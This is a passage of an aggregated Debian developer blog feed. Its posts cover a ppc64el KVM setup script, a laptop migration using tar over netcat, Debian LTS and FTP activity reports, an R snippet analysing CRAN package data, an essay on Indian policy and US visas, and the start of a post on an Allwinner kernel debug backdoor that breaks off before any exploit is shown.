deb http://mirror.internode.on.net/pub/debian/ buster main
deb http://security.debian.org/ buster/updates main
END
echo "APT::Install-Recommends False;" > /mnt/tmp/etc/apt/apt.conf
echo ppc64 > /mnt/tmp/etc/hostname
# /usr/bin/awk: error while loading shared libraries: cannot restore segment prot after reloc: Permission denied
# only needed for chroot
setsebool allow_execmod 1
chroot /mnt/tmp apt update
# why aren't they in the default install?
chroot /mnt/tmp apt install perl dialog
chroot /mnt/tmp apt dist-upgrade
chroot /mnt/tmp apt install bash-completion locales man-db openssh-server build-essential systemd-sysv ifupdown vim ca-certificates gnupg
# install kernel last because systemd install rebuilds initrd
chroot /mnt/tmp apt install linux-image-ppc64el
chroot /mnt/tmp dpkg-reconfigure locales
chroot /mnt/tmp passwd
cat << END > /mnt/tmp/etc/fstab
/dev/vda / ext4 noatime 0 0
#/dev/vdb none swap defaults 0 0
END
mkdir /mnt/tmp/root/.ssh
chmod 700 /mnt/tmp/root/.ssh
cp ~/.ssh/id_rsa.pub /mnt/tmp/root/.ssh/authorized_keys
chmod 600 /mnt/tmp/root/.ssh/authorized_keys
rm /mnt/tmp/vmlinux* /mnt/tmp/initrd*
mkdir /boot/ppc64
cp /mnt/tmp/boot/[vi]* /boot/ppc64
# clean up
umount /mnt/tmp
umount /mnt/tmp2
# setcap binary for starting bridged networking
setcap cap_net_admin+ep /usr/lib/qemu/qemu-bridge-helper
# afterwards set the access on /etc/qemu/bridge.conf so it can only
# be read by the user/group permitted to start qemu/kvm
echo "allow all" > /etc/qemu/bridge.conf
Here is an example script for starting kvm. It can be run by any user that can read /etc/qemu/bridge.conf.
#!/bin/bash
set -e
KERN="kernel /boot/ppc64/vmlinux-4.19.0-9-powerpc64le -initrd /boot/ppc64/initrd.img-4.19.0-9-powerpc64le"
# single network device, can have multiple
NET="-device e1000,netdev=net0,mac=02:02:00:00:01:04 -netdev tap,id=net0,helper=/usr/lib/qemu/qemu-bridge-helper"
# random number generator for fast start of sshd etc
RNG="-object rng-random,filename=/dev/urandom,id=rng0 -device virtio-rng-pci,rng=rng0"
# I have lockdown because it does no harm now and is good for future kernels
# I enable SE Linux everywhere
KERNCMD="net.ifnames=0 noresume security=selinux root=/dev/vda ro lockdown=confidentiality"
kvm -drive format=raw,file=/vmstore/ppc64,if=virtio $RNG -nographic -m 1024 -smp 2 $KERN -curses -append "$KERNCMD" $NET

9 July 2020

Enrico Zini: Laptop migration

This laptop used to be extra-flat My laptop battery started to explode in slow motion. HP requires 10 business days to repair my laptop under warranty, and I cannot afford that length of downtime. Alternatively, HP quoted me € 375 + VAT for on-site repairs, which I thought was very funny. For € 376.55 + VAT, which is pretty much exactly the same amount, I bought instead a refurbished ThinkPad X240 with a dual-core i5, 8G of RAM, 250G SSD, and a 1920x1080 IPS display, to use as a spare while my laptop is being repaired. I'd like to thank HP for giving me the opportunity to own a ThinkPad. Since I'm migrating my whole system to the spare and then (hopefully) back, I'm documenting what I need to be fully productive on new hardware. Install Debian A basic Debian netinst with no tasks selected is good enough to get going. Note that if wifi worked in Debian Installer, it doesn't mean that it will work in the minimal system it installed. See here for instructions on quickly bringing up wifi on a newly installed minimal system. Copy /home A simple tar of /home is all I needed to copy my data over. A neat way to do it was connecting the two laptops with an ethernet cable, and using netcat:
# On the source
tar -C / -zcf - home | nc -l -p 12345 -N
# On the target
nc 10.0.0.1 12345 | tar -C / -zxf -
Since the data travels unencrypted in this way, don't do it over wifi. Install packages I maintain a few simple local metapackages that depend on the packages I usually use. I could just install those and let apt bring in their dependencies. For the build dependencies of the programs I develop, I use mk-build-deps from the devscripts package to create metapackages that make sure they are installed. Here's an extract from debian/control of the metapackage:
Source: enrico
Section: admin
Priority: optional
Maintainer: Enrico Zini <enrico@debian.org>
Build-Depends: debhelper (>= 11)
Standards-Version: 3.7.2.1
Package: enrico
Section: admin
Architecture: all
Depends:
  mc, mmv, moreutils, powertop, syncmaildir, notmuch,
  ncdu, vcsh, ddate, jq, git-annex, eatmydata,
  vdirsyncer, khal, etckeeper, moc, pwgen
Description: Enrico's working environment
Package: enrico-devel
Section: devel
Architecture: all
Depends:
  git, python3-git, git-svn, gitk, ansible, fabric,
  valgrind, kcachegrind, zeal, meld, d-feet, flake8, mypy, ipython3,
  strace, ltrace
Description: Enrico's development environment
Package: enrico-gui
Section: x11
Architecture: all
Depends:
  xclip, gnome-terminal, qalculate-gtk, liferea, gajim,
  mumble, sm, syncthing, virt-manager
Recommends: k3b
Description: Enrico's GUI environment
Package: enrico-sanity
Section: admin
Architecture: all
Conflicts: libapache2-mod-php, libapache2-mod-php5, php5, php5-cgi, php5-fpm, libapache2-mod-php7.0, php7.0, libphp7.0-embed, libphp-embed, libphp5-embed
Description: Enrico's sanity
 Metapackage with a list of packages that I do not want anywhere near my
 system.
System-wide customizations I tend to avoid changing system-wide configuration as much as possible, so copying over /home and installing packages takes care of 99% of my needs. There are a few system-wide tweaks I cannot do without. For postfix, I have a little ansible playbook that takes care of it. Network Manager system connections need to be copied manually: a plain copy and a systemctl restart network-manager are enough. Note that Network Manager will ignore the files unless their owner and permissions are what it expects. Fine tuning Comparing the output of dpkg --get-selections between the old and the new system might highlight packages manually installed in a hurry and not added to the metapackages. Finally, what remains is fixing the sad state of mimetype associations, which seem to associate file types with whatever application was installed last, the phases of the moon, and whichever option is the most annoying. Currently on my system, PDFs are opened in inkscape by xdg-open and in calibre by run-mailcap. Let's see how long it takes to figure this one out.

9 May 2020

Thorsten Alteholz: My Debian Activities in April 2020

FTP master This month I accepted 384 packages and rejected 47. The overall number of packages that got accepted was 457. Debian LTS This was my seventieth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. This month my all in all workload has been 28.75h. During that time I did LTS uploads of: As there have been lots of no-dsa-CVEs I continued my work on wireshark. Last but not least I did some days of frontdesk duties. Debian ELTS This month was the twenty second ELTS month. During my small allocated time I only uploaded: I also did some days of frontdesk duties. Other stuff Unfortunately this month again strange things happened outside Debian and I only got some stuff done. I improved packaging of I sponsored uploads of I uploaded the new package On my Go challenge I uploaded:
golang-github-facebookgo-subset, golang-github-facebookgo-ensure, golang-github-shurcool-gopherjslib, golang-github-grafana-grafana-plugin-model, golang-github-crewjam-httperr, golang-github-hashicorp-terraform-svchost, golang-github-neelance-sourcemap, golang-github-neelance-astrewrite, golang-github-kisielk-gotool, golang-github-gopherjs-gopherjs, golang-github-yvasiyarov-newrelic-platform-go, golang-github-rhnvrm-simples3, golang-github-robfig-go-cache, golang-github-xorcare-pointer, golang-github-goburrow-serial

15 April 2017

Dirk Eddelbuettel: #5: Easy package information

Welcome to the fifth post in the recklessly rambling R rants series, or R4 for short. The third post showed an easy way to follow R development by monitoring (curated) changes on the NEWS file for the development version r-devel. As a concrete example, I mentioned that it has shown a nice new function (tools::CRAN_package_db()) coming up in R 3.4.0. Today we will build on that. Consider the following short snippet:
library(data.table)
getPkgInfo <- function() {
    if (exists("tools::CRAN_package_db")) {
        dat <- tools::CRAN_package_db()
    } else {
        tf <- tempfile()
        download.file("https://cloud.r-project.org/src/contrib/PACKAGES.rds", tf, quiet=TRUE)
        dat <- readRDS(tf)              # r-devel can now readRDS off a URL too
    }
    dat <- as.data.frame(dat)
    setDT(dat)
    dat
}
It defines a simple function getPkgInfo() as a wrapper around said new function from R 3.4.0, i.e. tools::CRAN_package_db(), and a fallback alternative using a tempfile (in the automagically cleaned R temp directory) and an explicit download and read of the underlying RDS file. As an aside, just this week the r-devel NEWS told us that such readRDS() operations can now read directly from a URL connection. Very nice---as RDS is a fantastic file format when you are working in R. Anyway, back to the RDS file! The snippet above returns a data.table object with as many rows as there are packages on CRAN, and basically all their (parsed !!) DESCRIPTION info and then some. A gold mine! Consider this to see how many packages have a dependency (in the sense of Depends, Imports or LinkingTo, but not Suggests because Suggests != Depends) on Rcpp:
R> dat <- getPkgInfo()
R> rcppRevDepInd <- as.integer(tools::dependsOnPkgs("Rcpp", recursive=FALSE, installed=dat))
R> length(rcppRevDepInd)
[1] 998
R>
So exciting---we will hit 1000 within days! But let's do some more analysis:
R> dat[ rcppRevDepInd, RcppRevDep := TRUE]  # set to TRUE for given set
R> dat[ RcppRevDep==TRUE, 1:2]
           Package Version
  1:      ABCoptim  0.14.0
  2: AbsFilterGSEA     1.5
  3:           acc   1.3.3
  4: accelerometry   2.2.5
  5:      acebayes   1.3.4
 ---                      
994:        yakmoR   0.1.1
995:  yCrypticRNAs  0.99.2
996:         yuima   1.5.9
997:           zic     0.9
998:       ziphsmm   1.0.4
R>
Here we index the reverse dependencies using the vector we had just computed, and then use that new variable to subset the data.table object. Given the aforementioned parsed information from all the DESCRIPTION files, we can learn more:
R> ## likely false entries
R> dat[ RcppRevDep==TRUE, ][NeedsCompilation!="yes", c(1:2,4)]
            Package Version                                                                         Depends
 1:         baitmet   1.0.0                                                           Rcpp, erah (>= 1.0.5)
 2:           bea.R   1.0.1                                                        R (>= 3.2.1), data.table
 3:            brms   1.6.0                     R (>= 3.2.0), Rcpp (>= 0.12.0), ggplot2 (>= 2.0.0), methods
 4: classifierplots   1.3.3                             R (>= 3.1), ggplot2 (>= 2.2), data.table (>= 1.10),
 5:           ctsem   2.3.1                                           R (>= 3.2.0), OpenMx (>= 2.3.0), Rcpp
 6:        DeLorean   1.2.4                                                  R (>= 3.0.2), Rcpp (>= 0.12.0)
 7:            erah   1.0.5                                                               R (>= 2.10), Rcpp
 8:             GxM     1.1                                                                              NA
 9:             hmi   0.6.3                                                                    R (>= 3.0.0)
10:        humarray     1.1 R (>= 3.2), NCmisc (>= 1.1.4), IRanges (>= 1.22.10),\nGenomicRanges (>= 1.16.4)
11:         iNextPD   0.3.2                                                                    R (>= 3.1.2)
12:          joinXL   1.0.1                                                                    R (>= 3.3.1)
13:            mafs   0.0.2                                                                              NA
14:            mlxR   3.1.0                                                           R (>= 3.0.1), ggplot2
15:    RmixmodCombi     1.0              R(>= 3.0.2), Rmixmod(>= 2.0.1), Rcpp(>= 0.8.0), methods,\ngraphics
16:             rrr   1.0.0                                                                    R (>= 3.2.0)
17:        UncerIn2     2.0                          R (>= 3.0.0), sp, RandomFields, automap, fields, gstat
R> 
There are a full seventeen packages which claim to depend on Rcpp while not having any compiled code of their own. That is likely false---but I keep them in my counts, however reluctantly. A CRAN-declared Depends: is a Depends:, after all. Another nice thing to look at is the total number of packages that declare that they need compilation:
R> ## number of packages with compiled code
R> dat[ , .(N=.N), by=NeedsCompilation]
   NeedsCompilation    N
1:               no 7625
2:              yes 2832
3:               No    1
R>
Isn't that awesome? It is 2832 out of (currently) 10458, or about 27.1%. Just over one in four. Now the 998 for Rcpp look even better as they are about 35% of all such packages. In other words, a little over one third of all packages with compiled code (which may be legacy C, Fortran or C++) use Rcpp. Wow. Before closing, one shoutout to Dirk Schumacher whose thankr, which I made the center of the last post, is now on CRAN. As a mighty fine and slim micropackage without external dependencies. Neat.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

30 January 2017

Shirish Agarwal: Different strokes

Delhi Metro - courtesy wikipedia.org Statutory warning It s a long read. I start by sharing I regret, I did not hold onto the Budget and Economics 101 blog post for one more day. I had been holding/thinking on to it for almost couple of weeks before posting, if I had just waited a day more, I would have been able to share an Indian Express story . While I thought that the work for the budget starts around 3 months before the budget, I came to learn from that article that it takes 6 months. As can be seen in the article, it is somewhat of a wasted opportunity, part of it probably due to the Government (irrespective of any political party, dynasty etc.) mismanagement. What has not been stated in the article is what I had shared earlier, reading between the lines, it seems that the Government isn t able to trust what it hears from its advisers and man on the street. Unlike Chanakya and many wise people before him who are credited with advising about good governance, that a good king is one who goes out in disguise, learns how his/er subjects are surviving, seeing what ills them and taking or even not taking corrective steps after seeing the problem from various angles. Of course it s easier said then done, though lot of Indian kings did try and ran successful provinces. There were also some who were more interested in gambling, women and threw/frittered away their kingdoms. The 6-month things while not being said in the Express article is probably more about checking and re-checking figures and sources to make sure they are able to read whatever pattern the various Big Businesses, Industry, Social Welfare schemes and people are saying I guess. And unless mass digitalization as well as overhaul of procedures, Right to Information (RTI) happens, don t see any improvement in the way the information is collected, interpreted and shared with the public at large. It would also require people who are able to figure out how things work sharing the inferences (right or wrong) through various media so there is discussion about figures and policy-making. Such researchers and their findings are sadly missing in Indian public discourses and only found in glossy coffee table books :(. One of the most basic question for instance is, How much of any policy should be based on facts and figures and how much giving fillip to products and services needed in short to medium term ? Also how much morality should play a part in Public Policy ? Surprisingly, or probably not, most Indian budgets are populist by nature with some scientific basis but most of the times there is no dialog about how the FM came to some conclusion or Policy-making. I am guessing a huge part of that has also to do with basic illiteracy as well as Economic and Financial Illiteracy. Just to share a well-known world-over example, one of the policies where the Government of India has been somewhat lethargic is wired broadband penetration. As have shared umpteen times, while superficially broadband penetration is happening, most of the penetration is the unreliable and more expensive mobile broadband penetration. While this may come as a shock to many of the users of technology, BSNL, a Government company who provides broadband for almost 70-80% of the ADSL wired broadband subscribers gives 50:1 contention ratio to its customers. One can now understand the pathetic speeds along with very old copper wiring (20 odd years) on which the network is running. 
The idea/idiom of running network using duct-tape seems pretty apt in here  Now, the Government couple of years ago introduced FFTH Fiber-to-the-home but because the charges are so high, it s not going anywhere. The Government could say 10% discount in your Income Tax rates if you get FFTH. This would force people to get FFTH and would also force BSNL to clean up its act. It has been documented that a percentage increase in broadband equals a similar percentage rise in GDP. Having higher speeds of broadband would mean better quality of streaming video as well as all sorts of remote teaching and sharing of ideas which will give a lot of fillip to all sorts of IT peripherals in short, medium and long-term as well. Not to mention, all the software that will be invented/coded to take benefit of all that speed. Although, realistically speaking I am cynical that the Government would bring something like this  Moving on Behind a truck - Courtesy TheEconomist.com Another interesting story which I had shared was a bit about World History Now the Economist sort of confirmed how things are in Pakistan. What is and was interesting that the article is made by a politically left-leaning magazine which is for globalization, business among other things . So, there seem to be only three options, either I and the magazine are correct or we both are reading it wrong. The third and last option is that the United States realize that Pakistan can no longer be trusted as Pakistan is siding more and more with Chinese and Russians, hence the article. Atlhough it seems a somewhat far-fetched idea as I don t see the magazine getting any brownie points with President Trump. Unless, The Economist becomes more hawkish, more right-wingish due to the new establishment. I can t claim to have any major political understanding or expertise but it does seem that Pakistan is losing friends. Even UAE have been cautiously building bridges with us. Now how this will play out in the medium to long-term depends much on the personal equations of the two heads of state, happenings in geopolitics around the world and the two countries, decisions they take, it is a welcome opportunity as far they (the Saudis) have funds they want to invest and India can use those investments to make new infrastructure. Now, I need a bit of help of Java and VCS (Version control system) experts . There is a small game project called Mars-Sim. I asked probably a few more questions than I should have and the result was that I was made a member of the game team even though I had shared with them that I m a non-coder. I think such a game is important as it s foss. Both the game itself is foss as well as its build-tools with a basic wiki. Such a game would be useful not only to Debian but all free software distributions. Journeying into the game Unfortunately, the game as it is currently, doesn t work with openjdk8 but private conversations with the devs. have shared they will work on getting it to work on OpenJDK 9 which though is sometime away. Now as it is a game, I knew it would have multiple multimedia assets. It took me quite sometime to figure out where most of the multimedia assets are. I was shocked to find that there aren t any tool/s in Debian as well a GNU/Linux to know about types of content is there inside a directory and its sub-directories. I framed it in a query and found a script as an answer . I renamed the script to file-extension-information.sh (for lack of imagination of better name). 
After that, I downloaded a snapshot of the head of the project from https://sourceforge.net/p/mars-sim/code/HEAD/tree/ where it shows a link to download the snapshot (https://sourceforge.net/code-snapshots/svn/m/ma/mars-sim/code/mars-sim-code-3847-trunk.zip), unzipped it and then ran the script on it:
[$] bash file-extension-information.sh mars-sim-code-3846-trunk
theme: 1770
dtd: 31915
py: 10815
project: 5627
JPG: 762476
fxml: 59490
vm: 876
dat: 15841044
java: 13052271
store: 1343
gitignore: 8
jpg: 3473416
md: 5156
lua: 57
gz: 1447
desktop: 281
wav: 83278
1: 2340
css: 323739
frag: 471
svg: 8948591
launch: 9404
index: 11520
iml: 27186
png: 3268773
json: 1217
ttf: 2861016
vert: 712
ogg: 12394801
prefs: 11541
properties: 186731
gradle: 611
classpath: 8538
pro: 687
groovy: 2711
form: 5780
txt: 50274
xml: 794365
js: 1465072
dll: 2268672
html: 1676452
gif: 38399
sum: 23040
(none): 1124
jsx: 32070
It gave me some idea of what sorts of files were under the repository. I do wish the script defaulted to showing file sizes in KB if not MB to better assess how the directory is made up, but it is not a big loss. The above listing told me that there are at the very least theme, JPG, dat, wav, png, ogg and lastly gif files. For lack of better tools, and to get an overview of where those multimedia assets are, I used ncdu:
[shirish@debian] - [~/games/mars-sim-code-3846-trunk] - [10210]
[$] ncdu mars-sim/
--- /home/shirish/games/mars-sim-code-3846-trunk/mars-sim --------------------------------------------------------------------------------------
46.2 MiB [##########] /mars-sim-ui
15.2 MiB [### ] /mars-sim-mapdata
8.3 MiB [# ] /mars-sim-core
2.1 MiB [ ] /mars-sim-service
500.0 KiB [ ] /mars-sim-main
188.0 KiB [ ] /mars-sim-android
72.0 KiB [ ] /mars-sim-network
16.0 KiB [ ] pom.xml
12.0 KiB [ ] /.settings
4.0 KiB [ ] mars-sim.store
4.0 KiB [ ] mars-sim.iml
4.0 KiB [ ] .project
I found that all the media is distributed randomly and posted a ticket about it. As I m not even a java newbie, could somebody look at mokun s comment and help out please ? On the same project, there has been talk of migrating to github.com Now whatever little I know of git, it makes a copy of the whole repository under .git/ folder/directory so having multimedia assets under git is a bad, bad idea, as each multimedia binary format file would be unique and no possibility of diff. between two binary files even though they may be the same file with some addition or subtraction from earlier version. I did file a question but am unhappy with the answers given. Can anybody give some definitive answers if they have been able to do how I am proposing , if yes, how did they go about it ? And lastly Immigrants of the United States in 2000 by country of birth America was founded by immigrants. Everybody knows the story about American Indians, the originals of the land were over-powered by the European settlers. So any claim, then and now that immigration did not help United States is just a lie. This came due to a conversation on #debconf by andrewsh
[18:37:06] I'd be more than happy myself to apply for an US tourist not transit visa when I really need it, as a transit visa isn't really useful, is just as costly as a tourist visa, and nearly as difficult to get as a tourist visa
[18:37:40] I'm not entirely sure I wish to transit through the US in its Trumplandia incarnation either
[18:38:07] likely to be more difficult and unfun
FWIW I am in complete agreement with Andrew s assessment of how it might be with foreigners. It has been on my mind and thoughts for quite some time although andrewsh put it eloquently. But as always I m getting ahead of myself. The conversation is because debconf this year would be in Canada. For many a cheap flight, one of the likely layovers/stopover can be the United States. I actually would have gone one step further, even if it was cheap transit visa, it would equally be unfun as it would discriminate. About couple of years back, a friend of mine while explaining what visa is, put it rather succinctly the visa officer looks at only 3 things a. Your financial position something which tells that you can take care of your financial needs if things go south b. You are not looking to settle there unlawfully c. You are not a criminal. While costs do matter, what is disturbing more is the form of extremism being displayed therein. While Indians from the South Asian continent in US have been largely successful, love to be in peace (one-off incidents do and will happen anywhere) if I had to take a transit or tourist visa in this atmosphere, it would leave a bad taste in the mouth. When one of my best friends is a Muslim, 20% of the population in India is made of Muslims and 99% of the time both of us co-exist in peace I simply can t take any alternative ideology. Even in Freakonomics 2.0 the authors when they shared that it s less than 0.1 percent of Muslims who are engaged in terrorist activities, if they were even 1 percent than all the world s armed forces couldn t fight them and couldn t keep anyone safe. Which simply means that 99.99% of even all Muslims are good. This resonates strongly with me for number of reasons. One of my uncles in early to late 80 s had an opportunity for work to visit Russia for official work. He went there and there were Secret Police after him all the time. While he didn t know it, I later read it, that it was SOP (Standard Operating Procedure) when all and any foreigners came visiting the country, and not just foreigners, they had spies for their own citizens. Russka a book I read several years ago explained the paranoia beautifully. While U.S. in those days was a more welcoming place for him. I am thankful as well as find it strange that Canada and States have such different visa procedures. While Canada would simply look at the above things, probably discreetly inquire about you if you have been a bad boy/girl in any way and then make a decision which is fine. For United States, even for a transit visa I probably would have to go to Interview where my world view would probably be in conflict with the current American world view. Interestingly, while I was looking at conversations on the web and one thing that is missing there is that nobody has talked about intelligence community. What Mr. Trump is saying in not so many words is that our intelligence even with all the e-mails we monitor and everything we do, we still can t catch you. It almost seems like giving a back-handed compliment to the extremists saying you do a better job than our intelligence community. This doesn t mean that States doesn t have interesting things to give to the world, Star Trek conventions, Grand Canyon (which probably would require me more than a month or more to explore even a little part), NASA, Intel, AMD, SpaceX, CES (when it s held) and LPC (Linux Plumber s conference where whose who come to think of roadmap for GNU/Linux). 
What I wouldn t give to be a fly in the wall when LPC, CES happens in the States. What I actually found very interesting is that in the current Canadian Government, if what I read and heard is true, then Justin Trudeau, the Prime Minister of Canada made 50 of his cabinet female. Just like in the article, studies even in Indian parliament have shown that when women are in power, questions about social justice, equality, common good get asked and policies made. If I do get the opportunity to be part of debconf, I would like to see, hear, watch, learn how the women cabinet is doing things. I am assuming that reporting and analysis standards of whatever decisions are more transparent and more people are engaged in the political process to know what their elected representatives are doing. Mountain biking in British Columbia, Canada - source wikipedia.org One another interesting point I came to know is that Canada is home to bicycling paths. While I stopped bicycling years ago  as it has been becoming more and more dangerous to bicycle here in Pune as there is no demarcation for cyclists, I am sure lot of Canadians must be using this opportunity fully. Lastly, on the debconf preparation stage, things have started becoming a bit more urgent and hectic. From a monthly IRC meet, it has now become a weekly meet. Both the wiki and the website are slowly taking up shape. http://deb.li/dc17kbp is a nice way to know/see progress of the activities happening . One important decision that would be taken today is where people would stay during debconf. There are options between on-site and two places around the venue, one 1.9 km around, the other 5 km. mark. Each has its own good and bad points. It would be interesting to see which place gets selected and why.
Filed under: Miscellenous Tagged: #budget, #Canada, #debconf organization, #discrimination, #Equal Opportunity, #Fiber, #svn, #United States, #Version Control, Broadband, Git, Pakistan, Subversion

30 June 2016

Chris Lamb: Free software activities in June 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#58, #59 & #60)
Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:
  • "Frontdesk" duties, triaging CVEs, etc.
  • Extended the lts-cve-triage.py script to ignore packages that are not subject to Long Term Support.

  • Issued DLA 512-1 for mantis fixing an XSS vulnerability.
  • Issued DLA 513-1 for nspr correcting a buffer overflow in a sprintf utility.
  • Issued DLA 515-1 for libav patching a memory corruption issue.
  • Issued DLA 524-1 for squidguard fixing a reflected cross-site scripting vulnerability.
  • Issued DLA 525-1 for gimp correcting a use-after-free vulnerability in the channel and layer properties parsing process.

Uploads
  • redis (2:3.2.1-1) New upstream bugfix release, plus subsequent upload to the backports repository.
  • python-django (1.10~beta1-1) New upstream experimental release.
  • libfiu (0.94-5) Misc packaging updates.


RC bugs

I also filed 170 FTBFS bugs against a7xpg, acepack, android-platform-dalvik, android-platform-frameworks-base, android-platform-system-extras, android-platform-tools-base, apache-directory-api, aplpy, appstream-generator, arc-gui-clients, assertj-core, astroml, bamf, breathe, buildbot, cached-property, calf, celery-haystack, charmtimetracker, clapack, cmake, commons-javaflow, dataquay, dbi, django-celery, django-celery-transactions, django-classy-tags, django-compat, django-countries, django-floppyforms, django-hijack, django-localflavor, django-markupfield, django-model-utils, django-nose, django-pipeline, django-polymorphic, django-recurrence, django-sekizai, django-sitetree, django-stronghold, django-taggit, dune-functions, elementtidy, epic4-help, fcopulae, fextremes, fnonlinear, foreign, fort77, fregression, gap-alnuth, gcin, gdb-avr, ggcov, git-repair, glance, gnome-twitch, gnustep-gui, golang-github-audriusbutkevicius-go-nat-pmp, golang-github-gosimple-slug, gprbuild, grafana, grantlee5, graphite-api, guacamole-server, ido, jless, jodreports, jreen, kdeedu-data, kdewebdev, kwalify, libarray-refelem-perl, libdbusmenu, libdebian-package-html-perl, libdevice-modem-perl, libindicator, liblrdf, libmail-milter-perl, libopenraw, libvisca, linuxdcpp, lme4, marble, mgcv, mini-buildd, mu-cade, mvtnorm, nose, octave-epstk, onioncircuits, opencolorio, parsec47, phantomjs, php-guzzlehttp-ringphp, pjproject, pokerth, prayer, pyevolve, pyinfra, python-asdf, python-ceilometermiddleware, python-django-bootstrap-form, python-django-compressor, python-django-contact-form, python-django-debug-toolbar, python-django-extensions, python-django-feincms, python-django-formtools, python-django-jsonfield, python-django-mptt, python-django-openstack-auth, python-django-pyscss, python-django-registration, python-django-tagging, python-django-treebeard, python-geopandas, python-hdf5storage, python-hypothesis, python-jingo, python-libarchive-c, python-mhash, python-oauth2client, python-proliantutils, python-pytc, python-restless, python-tidylib, python-websockets, pyvows, qct, qgo, qmidinet, quodlibet, r-cran-gss, r-cran-runit, r-cran-sn, r-cran-stabledist, r-cran-xml, rgl, rglpk, rkt, rodbc, ruby-devise-two-factor, ruby-json-schema, ruby-puppet-syntax, ruby-rspec-puppet, ruby-state-machine, ruby-xmlparser, ryu, sbd, scanlogd, signond, slpvm, sogo, sphinx-argparse, squirrel3, sugar-jukebox-activity, sugar-log-activity, systemd, tiles, tkrplot, twill, ucommon, urca, v4l-utils, view3dscene, xqilla, youtube-dl & zope.interface.

FTP Team

As a Debian FTP assistant I ACCEPTed 186 packages: akonadi4, alljoyn-core-1509, alljoyn-core-1604, alljoyn-gateway-1504, alljoyn-services-1504, alljoyn-services-1509, alljoyn-thin-client-1504, alljoyn-thin-client-1509, alljoyn-thin-client-1604, apertium-arg, apertium-arg-cat, apertium-eo-fr, apertium-es-it, apertium-eu-en, apertium-hbs, apertium-hin, apertium-isl, apertium-kaz, apertium-spa, apertium-spa-arg, apertium-tat, apertium-urd, arc-theme, argus-clients, ariba, beast-mcmc, binwalk, bottleneck, colorfultabs, dh-runit, django-modeltranslation, dq, dublin-traceroute, duktape, edk2, emacs-pdf-tools, eris, erlang-p1-oauth2, erlang-p1-sqlite3, erlang-p1-xmlrpc, faba-icon-theme, firefox-branding-iceweasel, golang-1.6, golang-defaults, golang-github-aelsabbahy-gonetstat, golang-github-howeyc-gopass, golang-github-oleiade-reflections, golang-websocket, google-android-m2repository-installer, googler, goto-chg-el, gr-radar, growl-for-linux, guvcview, haskell-open-browser, ipe, labplot, libalt-alien-ffi-system-perl, libanyevent-fcgi-perl, libcds-savot-java, libclass-ehierarchy-perl, libconfig-properties-perl, libffi-checklib-perl, libffi-platypus-perl, libhtml-element-library-perl, liblwp-authen-oauth2-perl, libmediawiki-dumpfile-perl, libmessage-passing-zeromq-perl, libmoosex-types-portnumber-perl, libmpack, libnet-ip-xs-perl, libperl-osnames-perl, libpodofo, libprogress-any-perl, libqtpas, librdkafka, libreoffice, libretro-beetle-pce-fast, libretro-beetle-psx, libretro-beetle-vb, libretro-beetle-wswan, libretro-bsnes-mercury, libretro-mupen64plus, libservicelog, libtemplate-plugin-datetime-perl, libtext-metaphone-perl, libtins, libzmq-ffi-perl, licensecheck, link-grammar, linux, linux-signed, lua-busted, magics++, mkalias, moka-icon-theme, neutron-vpnaas, newlisp, node-absolute-path, node-ejs, node-errs, node-has-flag, node-lodash-compat, node-strip-ansi, numba, numix-icon-theme, nvidia-graphics-drivers, nvidia-graphics-drivers-legacy-304xx, nvidia-graphics-drivers-legacy-340xx, obs-studio, opencv, pacapt, pgbackrest, postgis, powermock, primer3, profile-sync-daemon, pyeapi, pypandoc, pyssim, python-cutadapt, python-cymruwhois, python-fisx, python-formencode, python-hkdf, python-model-mommy, python-nanomsg, python-offtrac, python-social-auth, python-twiggy, python-vagrant, python-watcherclient, python-xkcd, pywps, r-bioc-deseq2, r-bioc-dnacopy, r-bioc-ensembldb, r-bioc-geneplotter, r-cran-adegenet, r-cran-adephylo, r-cran-distory, r-cran-fields, r-cran-future, r-cran-globals, r-cran-htmlwidgets, r-cran-listenv, r-cran-mlbench, r-cran-mlmrev, r-cran-pheatmap, r-cran-pscbs, r-cran-r.cache, refind, relatorio, reprotest, ring, ros-ros-comm, ruby-acts-as-tree, ruby-chronic-duration, ruby-flot-rails, ruby-numerizer, ruby-u2f, selenium-firefoxdriver, simgrid, skiboot, smtpping, snap-confine, snapd, sniffles, sollya, spin, subuser, superlu, swauth, swift-plugin-s3, syncthing, systemd-bootchart, tdiary-theme, texttable, tidy-html5, toxiproxy, twinkle, vmtk, wait-for-it, watcher, wcslib & xapian-core.

14 May 2016

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed. Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux. In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingeniería, UNAM. It has been quite successful, and fun. Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot, an irony. As part of the "Linux Userspace" and "Boot process" modules, we put a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system. Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... the people we already know and trust to do this kind of work! Most current ARM chips cannot run with the stock, upstream Linux kernel. They require a set of patches that different vendors pile up to support their basic hardware (remember, those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes, that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it. So, in many cases, we are stuck running with nonstandard kernels, full of huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right? Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel. This kernel has a very ugly flaw: a debugging mode left open that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:
Debian GNU/Linux 8 bananapi ttyS0
banana login: gwolf
Password:
Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
